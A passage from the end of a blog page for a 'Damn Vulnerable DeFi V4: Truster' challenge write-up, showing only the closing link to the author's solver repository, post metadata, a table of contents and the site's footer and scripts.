<p>You can find through <a class="link"   target="_blank" rel="noopener" href="https://github.com/kujen5/Damn-Vulnerable-Defi-Solutions/tree/main/Truster" >this github link the repository that contains my solver <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a> and all the future Damn Vulnerable DeFi solutions Inshallah!</p>
<p>See you next time~</p>

        </div>

        
            <div class="post-copyright-info px-2 sm:px-6 md:px-8">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> Damn Vulnerable DeFi V4: Truster</li>
        <li><strong>Author:</strong> Foued SAIDI</li>
        <li><strong>Created at
                :</strong> 2025-12-31 16:41:32</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2025-12-31 14:54:26
            </li>
        
        <li>
            <strong>Link:</strong> https://kujen5.github.io/2025/12/31/Damn-Vulnerable-DeFi-V4-Truster/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

            </div>
        

        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                    <div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="prev"
                        rel="prev"
                        href="/2026/01/10/Hackthebox-Previous/"
                        >
                            <span class="left arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-left"></i>
                            </span>
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">Hackthebox: Previous</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2025/12/22/Ethernaut-Fallback/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">Ethernaut: Fallback</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">Damn Vulnerable DeFi V4: Truster</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Overview"><span class="nav-text">Overview</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E2%80%98Truster%E2%80%99-challenge"><span class="nav-text">‘Truster’ challenge</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Challenge-Description"><span class="nav-text">Challenge Description</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Understanding-the-contract"><span class="nav-text">Understanding the contract</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Overview-1"><span class="nav-text">Overview</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#DamnValuableToken-sol"><span class="nav-text">DamnValuableToken.sol</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#TrusterLenderPool-sol"><span class="nav-text">TrusterLenderPool.sol</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Point-of-Failure"><span class="nav-text">Point of Failure</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Exploitation"><span class="nav-text">Exploitation</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Exploit-Test-Case"><span class="nav-text">Exploit Test Case</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Conclusion"><span class="nav-text">Conclusion</span></a></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2023</span>
              -
            
            2026&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">Foued SAIDI</a>
        </div>
        
            <script data-swup-reload-script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.5.2</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    

</main>


    
<script src="/js/libs/Swup.min.js"></script>

<script src="/js/libs/SwupSlideTheme.min.js"></script>

<script src="/js/libs/SwupScriptsPlugin.min.js"></script>

<script src="/js/libs/SwupProgressPlugin.min.js"></script>

<script src="/js/libs/SwupScrollPlugin.min.js"></script>

<script src="/js/libs/SwupPreloadPlugin.min.js"></script>

<script>
    const swup = new Swup({
        plugins: [
            new SwupScriptsPlugin({
                optin: true,
            }),
            new SwupProgressPlugin(),
            new SwupScrollPlugin({
                offset: 80,
            }),
            new SwupSlideTheme({
                mainElement: ".main-content-body",
            }),
            new SwupPreloadPlugin(),
        ],
        containers: ["#swup"],
    });
</script>







<script src="/js/tools/imageViewer.js" type="module"></script>

<script src="/js/utils.js" type="module"></script>

<script src="/js/main.js" type="module"></script>

<script src="/js/layouts/navbarShrink.js" type="module"></script>

<script src="/js/tools/scrollTopBottom.js" type="module"></script>

<script src="/js/tools/lightDarkSwitch.js" type="module"></script>

<script src="/js/layouts/categoryList.js" type="module"></script>





    
<script src="/js/tools/codeBlock.js" type="module"></script>




    
<script src="/js/layouts/lazyload.js" type="module"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/libs/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js" type="module"></script>







<div class="post-scripts" data-swup-reload-script>
    
        
<script src="/js/libs/anime.min.js"></script>

        
<script src="/js/tools/tocToggle.js" type="module"></script>

<script src="/js/layouts/toc.js" type="module"></script>

<script src="/js/plugins/tabs.js" type="module"></script>

    
</div>


</body>
</html>
